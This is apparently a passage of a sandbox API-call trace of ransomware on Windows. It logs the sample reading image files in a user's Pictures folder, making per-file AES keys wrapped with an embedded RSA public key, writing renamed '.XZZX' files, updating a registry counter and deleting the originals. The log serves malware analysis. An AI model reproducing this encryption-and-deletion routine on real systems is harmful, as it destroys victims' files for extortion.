f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0123.311] OutputDebugStringW (lpOutputString="end") [0123.311] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v0\x88Ê\x03`Õ_\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x45fdbf4, pcbBinary=0x45fd3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x45fdbf4, pcbBinary=0x45fd3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0123.311] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x45fdbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x45fd3dc, pcbStructInfo=0x45fd3d8 | out: pvStructInfo=0x45fd3dc, pcbStructInfo=0x45fd3d8) returned 1 [0123.311] CryptAcquireContextW (in: phProv=0x45fd3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x45fd3e4*=0x3ce2390) returned 1 [0123.312] CryptImportPublicKeyInfo (in: hCryptProv=0x3ce2390, dwCertEncodingType=0x1, pInfo=0x3cb1f88*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3cb1fb8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3cb1fc0*, PublicKey.cUnusedBits=0x0), phKey=0x45fd3ec | out: phKey=0x45fd3ec*=0x3a6310) returned 1 [0123.312] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0123.312] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0123.312] CryptEncrypt (in: hKey=0x3a6310, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x45fd3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x45fd3f0*=0x80) returned 1 [0123.312] CryptEncrypt (in: hKey=0x3a6310, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3ce2418*, pdwDataLen=0x45fd3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3ce2418*, pdwDataLen=0x45fd3e8*=0x80) returned 1 [0123.313] WriteFile (in: hFile=0x5d8, lpBuffer=0x3ce2418*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x45fe438, lpOverlapped=0x0 | out: lpBuffer=0x3ce2418*, lpNumberOfBytesWritten=0x45fe438*=0x80, lpOverlapped=0x0) returned 1 [0123.313] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0123.313] WriteFile (in: hFile=0x5d8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x45fe438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x45fe438*=0x5, lpOverlapped=0x0) returned 1 [0123.313] GetUserNameW (in: lpBuffer=0x45fe1f8, pcbBuffer=0x45fdfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x45fdfe0) returned 1 [0123.313] wsprintfW (in: param_1=0x45fdff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0123.313] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x45fdfe4 | out: phkResult=0x45fdfe4*=0x5dc) returned 0x0 [0123.313] RegQueryValueExW (in: hKey=0x5dc, lpValueName="E1010314", lpReserved=0x0, lpType=0x45fdfd8, lpData=0x45fdfec, lpcbData=0x45fdfdc*=0x4 | out: lpType=0x45fdfd8*=0x4, lpData=0x45fdfec*=0x8a, lpcbData=0x45fdfdc*=0x4) returned 0x0 [0123.313] RegCloseKey (hKey=0x5dc) returned 0x0 [0123.313] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x45fdfe8 | out: phkResult=0x45fdfe8*=0x5dc) returned 0x0 [0123.313] RegSetValueExW (in: hKey=0x5dc, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x45fdfec*=0x8b, cbData=0x4 | out: lpData=0x45fdfec*=0x8b) returned 0x0 [0123.313] RegCloseKey (hKey=0x5dc) returned 0x0 [0123.313] VirtualFree (lpAddress=0x4600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0123.314] VirtualFree (lpAddress=0x4610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0123.314] CloseHandle (hObject=0x5d8) returned 1 [0123.315] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0123.316] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0123.316] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\diyvOkO.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\diyvoko.gif")) returned 1 [0123.317] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\diyvOkO.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\diyvoko.gif")) returned 0 Thread: id = 403 os_tid = 0x95c [0123.465] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0123.465] lstrcpyW (in: lpString1=0x420f460, lpString2="d_ywXujVU Wq1E.jpg" | out: lpString1="d_ywXujVU Wq1E.jpg") returned="d_ywXujVU Wq1E.jpg" [0123.465] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0123.465] SetErrorMode (uMode=0x1) returned 0x1 [0123.465] lstrcpyW (in: lpString1=0x420f860, lpString2="d_ywXujVU Wq1E.jpg" | out: lpString1="d_ywXujVU Wq1E.jpg") returned="d_ywXujVU Wq1E.jpg" [0123.465] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x3c3788ab, Data2=0x6192, Data3=0x4801, Data4=([0]=0x8b, [1]=0x62, [2]=0x20, [3]=0x6b, [4]=0x7f, [5]=0xa4, [6]=0x36, [7]=0x9c))) returned 0x0 [0123.465] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\d_ywXujVU Wq1E.jpg") returned 61 [0123.465] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0123.465] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\6274BC861B7171923C3788AB1F9255DA.XZZX") returned 80 [0123.465] StrStrW (lpFirst="d_ywXujVU Wq1E.jpg", lpSrch="XZZX") returned 0x0 [0123.465] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\d_ywXujVU Wq1E.jpg", dwFileAttributes=0x20) returned 1 [0123.466] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\d_ywXujVU Wq1E.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\d_ywxujvu wq1e.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5e8 [0123.466] ReadFile (in: hFile=0x5e8, lpBuffer=0x3d0ceb0, nNumberOfBytesToRead=0x594f, lpNumberOfBytesRead=0x420e418, lpOverlapped=0x0 | out: lpBuffer=0x3d0ceb0*, lpNumberOfBytesRead=0x420e418*=0x594f, lpOverlapped=0x0) returned 1 [0123.467] CloseHandle (hObject=0x5e8) returned 1 [0123.467] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3350000 [0123.468] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40e0000 [0123.468] SetErrorMode (uMode=0x1) returned 0x1 [0123.468] lstrcpyW (in: lpString1=0x420e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0123.468] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3ce24a0) returned 1 [0123.471] CryptGenKey (in: hProv=0x3ce24a0, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3a6290) returned 1 [0123.631] CryptExportKey (in: hKey=0x3a6290, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x420e41c | out: pbData=0x0*, pdwDataLen=0x420e41c*=0x94) returned 1 [0123.631] CryptExportKey (in: hKey=0x3a6290, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40e0000, pdwDataLen=0x420e41c | out: pbData=0x40e0000*, pdwDataLen=0x420e41c*=0x94) returned 1 [0123.631] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0123.631] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0123.632] CryptDestroyKey (hKey=0x3a6290) returned 1 [0123.632] CryptReleaseContext (hProv=0x3ce24a0, dwFlags=0x0) returned 1 [0123.632] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\6274BC861B7171923C3788AB1F9255DA.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\6274bc861b7171923c3788ab1f9255da.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5e8 [0123.632] WriteFile (in: hFile=0x5e8, lpBuffer=0x3d0ceb0*, nNumberOfBytesToWrite=0x594f, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3d0ceb0*, lpNumberOfBytesWritten=0x420e438*=0x594f, lpOverlapped=0x0) returned 1 [0123.633] SetFilePointer (in: hFile=0x5e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x594f [0123.633] WriteFile (in: hFile=0x5e8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0123.633] SetFilePointer (in: hFile=0x5e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x5954 [0123.633] WriteFile (in: hFile=0x5e8, lpBuffer=0x420f860*, nNumberOfBytesToWrite=0x24, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x420f860*, lpNumberOfBytesWritten=0x420e438*=0x24, lpOverlapped=0x0) returned 1 [0123.633] SetFilePointer (in: hFile=0x5e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x5978 [0123.633] WriteFile (in: hFile=0x5e8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0123.633] SetFilePointer (in: hFile=0x5e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x597d [0123.633] SetErrorMode (uMode=0x1) returned 0x1 [0123.633] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0123.633] OutputDebugStringW (lpOutputString="end") [0123.634] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v0\x88Ê\x03`Õ \x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0123.634] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x420dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8 | out: pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8) returned 1 [0123.634] CryptAcquireContextW (in: phProv=0x420d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x420d3e4*=0x3ce24a0) returned 1 [0123.634] CryptImportPublicKeyInfo (in: hCryptProv=0x3ce24a0, dwCertEncodingType=0x1, pInfo=0x3cb21f8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3cb2228*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3cb2230*, PublicKey.cUnusedBits=0x0), phKey=0x420d3ec | out: phKey=0x420d3ec*=0x3cdd9d8) returned 1 [0123.634] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0123.635] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0123.635] CryptEncrypt (in: hKey=0x3cdd9d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x420d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x420d3f0*=0x80) returned 1 [0123.635] CryptEncrypt (in: hKey=0x3cdd9d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3ce2528*, pdwDataLen=0x420d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3ce2528*, pdwDataLen=0x420d3e8*=0x80) returned 1 [0123.635] WriteFile (in: hFile=0x5e8, lpBuffer=0x3ce2528*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3ce2528*, lpNumberOfBytesWritten=0x420e438*=0x80, lpOverlapped=0x0) returned 1 [0123.635] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0123.635] WriteFile (in: hFile=0x5e8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0123.635] GetUserNameW (in: lpBuffer=0x420e1f8, pcbBuffer=0x420dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x420dfe0) returned 1 [0123.636] wsprintfW (in: param_1=0x420dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0123.636] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe4 | out: phkResult=0x420dfe4*=0x5c0) returned 0x0 [0123.636] RegQueryValueExW (in: hKey=0x5c0, lpValueName="E1010314", lpReserved=0x0, lpType=0x420dfd8, lpData=0x420dfec, lpcbData=0x420dfdc*=0x4 | out: lpType=0x420dfd8*=0x4, lpData=0x420dfec*=0x8b, lpcbData=0x420dfdc*=0x4) returned 0x0 [0123.636] RegCloseKey (hKey=0x5c0) returned 0x0 [0123.636] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe8 | out: phkResult=0x420dfe8*=0x5c0) returned 0x0 [0123.636] RegSetValueExW (in: hKey=0x5c0, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x420dfec*=0x8c, cbData=0x4 | out: lpData=0x420dfec*=0x8c) returned 0x0 [0123.636] RegCloseKey (hKey=0x5c0) returned 0x0 [0123.636] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0123.636] VirtualFree (lpAddress=0x40e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0123.637] CloseHandle (hObject=0x5e8) returned 1 [0123.638] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0123.638] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0123.638] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\d_ywXujVU Wq1E.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\d_ywxujvu wq1e.jpg")) returned 1 [0123.641] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\d_ywXujVU Wq1E.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\d_ywxujvu wq1e.jpg")) returned 0 Thread: id = 404 os_tid = 0x960 [0123.642] lstrcpyA (in: lpString1=0x434fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0123.642] lstrcpyW (in: lpString1=0x434f460, lpString2="E mrX_4M3P5jMLSuXG.bmp" | out: lpString1="E mrX_4M3P5jMLSuXG.bmp") returned="E mrX_4M3P5jMLSuXG.bmp" [0123.642] lstrcpyW (in: lpString1=0x434e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0123.642] SetErrorMode (uMode=0x1) returned 0x1 [0123.642] lstrcpyW (in: lpString1=0x434f860, lpString2="E mrX_4M3P5jMLSuXG.bmp" | out: lpString1="E mrX_4M3P5jMLSuXG.bmp") returned="E mrX_4M3P5jMLSuXG.bmp" [0123.642] CoCreateGuid (in: pguid=0x434e440 | out: pguid=0x434e440*(Data1=0x344be4a4, Data2=0xe16b, Data3=0x4dba, Data4=([0]=0xb4, [1]=0x5a, [2]=0x4c, [3]=0xb5, [4]=0x69, [5]=0x5d, [6]=0xa3, [7]=0x10))) returned 0x0 [0123.642] wsprintfW (in: param_1=0x434ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\E mrX_4M3P5jMLSuXG.bmp") returned 65 [0123.642] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x434fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0123.642] wsprintfW (in: param_1=0x434e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8FACB48C4470F6BE344BE4A448A5DB06.XZZX") returned 80 [0123.642] StrStrW (lpFirst="E mrX_4M3P5jMLSuXG.bmp", lpSrch="XZZX") returned 0x0 [0123.642] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\E mrX_4M3P5jMLSuXG.bmp", dwFileAttributes=0x20) returned 1 [0123.643] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\E mrX_4M3P5jMLSuXG.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\e mrx_4m3p5jmlsuxg.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d8 [0123.643] ReadFile (in: hFile=0x5d8, lpBuffer=0x3cf1358, nNumberOfBytesToRead=0xc4ce, lpNumberOfBytesRead=0x434e418, lpOverlapped=0x0 | out: lpBuffer=0x3cf1358*, lpNumberOfBytesRead=0x434e418*=0xc4ce, lpOverlapped=0x0) returned 1 [0123.648] CloseHandle (hObject=0x5d8) returned 1 [0123.648] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3350000 [0123.648] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40a0000 [0123.649] SetErrorMode (uMode=0x1) returned 0x1 [0123.649] lstrcpyW (in: lpString1=0x434e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0123.649] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3ce25b0) returned 1 [0123.652] CryptGenKey (in: hProv=0x3ce25b0, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3cdda18) returned 1 [0123.830] CryptExportKey (in: hKey=0x3cdda18, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x434e41c | out: pbData=0x0*, pdwDataLen=0x434e41c*=0x94) returned 1 [0123.830] CryptExportKey (in: hKey=0x3cdda18, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40a0000, pdwDataLen=0x434e41c | out: pbData=0x40a0000*, pdwDataLen=0x434e41c*=0x94) returned 1 [0123.830] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0123.831] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0123.831] CryptDestroyKey (hKey=0x3cdda18) returned 1 [0123.831] CryptReleaseContext (hProv=0x3ce25b0, dwFlags=0x0) returned 1 [0123.831] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8FACB48C4470F6BE344BE4A448A5DB06.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8facb48c4470f6be344be4a448a5db06.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c4 [0123.832] WriteFile (in: hFile=0x5c4, lpBuffer=0x3cf1358*, nNumberOfBytesToWrite=0xc4ce, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x3cf1358*, lpNumberOfBytesWritten=0x434e438*=0xc4ce, lpOverlapped=0x0) returned 1 [0123.833] SetFilePointer (in: hFile=0x5c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc4ce [0123.833] WriteFile (in: hFile=0x5c4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0123.833] SetFilePointer (in: hFile=0x5c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc4d3 [0123.833] WriteFile (in: hFile=0x5c4, lpBuffer=0x434f860*, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x434f860*, lpNumberOfBytesWritten=0x434e438*=0x2c, lpOverlapped=0x0) returned 1 [0123.833] SetFilePointer (in: hFile=0x5c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc4ff [0123.833] WriteFile (in: hFile=0x5c4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0123.833] SetFilePointer (in: hFile=0x5c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, 